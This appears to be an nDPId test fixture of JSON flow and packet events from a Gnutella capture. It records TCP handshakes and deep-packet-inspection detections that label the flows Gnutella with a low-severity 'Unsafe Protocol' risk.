+00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BGFAAIAGRVEKAAIPYEFEwsSJipmyoW1hAAAAAIAC+vBT5wAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iw5AAIAGft8KAAIPUAf8wMSKGugAPu54AAAAAIAC+vBNHwAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0e4RAAIAGraEKAAIPLR+YcMSLaOPXzV5xAAAAAIAC+vA+0wAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xktAAIAG9NcKAAIPjoSlDcSMd2bhikpDAAAAAIAC+vDMvQAAAgQFtAEDAwgBAQQC"} +00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xP1AAIAGoVMKAAIPvKXLvsSNVetyIY5LAAAAAIAC+vDExgAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90746,"flow_last_seen":90746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90746,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":90746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90746,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Yo9AAIAGTC8KAAIPwSB+1sSO6MzJTpedAAAAAIAC+vAZ0gAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0OINAAIAGsckKAAIPubtKrcSP0PGcxJ9SAAAAAIAC+vCSDwAAAgQFtAEDAwgBAQQC"} +00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SsxAAIAGLMcKAAIPwqO0fsSQKkliYWFkAAAAAIAC+vA+TwAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":50321,"dst_port":4876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Ar9AAIAGpjAKAAIP1eVv4MSREwzLMAmEAAAAAIAC+vB1+AAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ptBAAIAGmUcKAAIPpIQKGcSS2AZOgZ\/9AAAAAIAC+vAuWwAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90747,"flow_last_seen":90747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":90747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eN9AAIAGqLsKAAIPM0SZ1sSTZo3Cj79BAAAAAIAC+vDuAwAAAgQFtAEDAwgBAQQC"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":90760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90760,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0kAAEAGeoC8PTS3CgACDy5MxHwAp\/gBiFqWg2AS\/\/+QwwAAAgQFtA=="} 
+00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":90760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90760,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoc0ZAAIAGioYKAAIPvD00t8R8LkyIWpaDAKf4AlAQ+vCtjwAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0sAAEAGN+GOhKUNCgACD3dmxIwAqPIB4YpKRGAS\/\/\/+CQAAAgQFtA=="} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0wAAEAGSwNNOtM0CgACDw7exHgAqewBNESdzWAS\/\/\/ZhQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":90767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90767,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxkxAAIAG9OIKAAIPjoSlDcSMd2bhikpEAKjyAlAQ+vAa1gAA"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":90768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90768,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoHOhAAIAGsWoKAAIPTTrTNMR4Dt40RJ3NAKnsAlAQ+vD2UQAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":90768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90768,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA04AAEAG9E3Co7R+CgACDypJxJAAquYBYmFhZWAS\/\/97mQAAAgQFtA=="} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSs1AAIAGLNIKAAIPwqO0fsSQKkliYWFlAKrmAlAQ+vCYZQAA"} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1AAAEAGZwW5u0qtCgACD9DxxI8Aq+ABnMSfU2AS\/\/\/VWAAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1EAAEAG4wi8pcu+CgACD1XrxI0ArNoBciGOTGAS\/\/8ODwAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoOIRAAIAGsdQKAAIPubtKrcSP0PGcxJ9TAKvgAlAQ+vDyJAAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxP5AAIAGoV4KAAIPvKXLvsSNVetyIY5MAKzaAlAQ+vAq2wAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1UAAEAGyRlYeEnXCgACD1\/yxH8ArdQBY7MtEWAS\/\/9f0wAAAgQFtA=="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1YAAEAGK3HBIH7WCgACD+jMxI4Ars4ByU6XnmAS\/\/9vGAAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo+\/1AAIAGUHQKAAIPWHhJ18R\/X\/Jjsy0RAK3UAlAQ+vB8nwAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1cAAEAGVX5o7qz6CgACD1v8xIgAr8gBAIGaT2AS\/\/\/yGAAAAgQFtA=="} 
+00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoYpBAAIAGTDoKAAIPwSB+1sSO6MzJTpeeAK7OAlAQ+vCL5AAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":90777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90777,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBk9AAIAG0okKAAIPaO6s+sSIW\/wAgZpPAK\/IAlAQ+vAO5QAA"} 
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 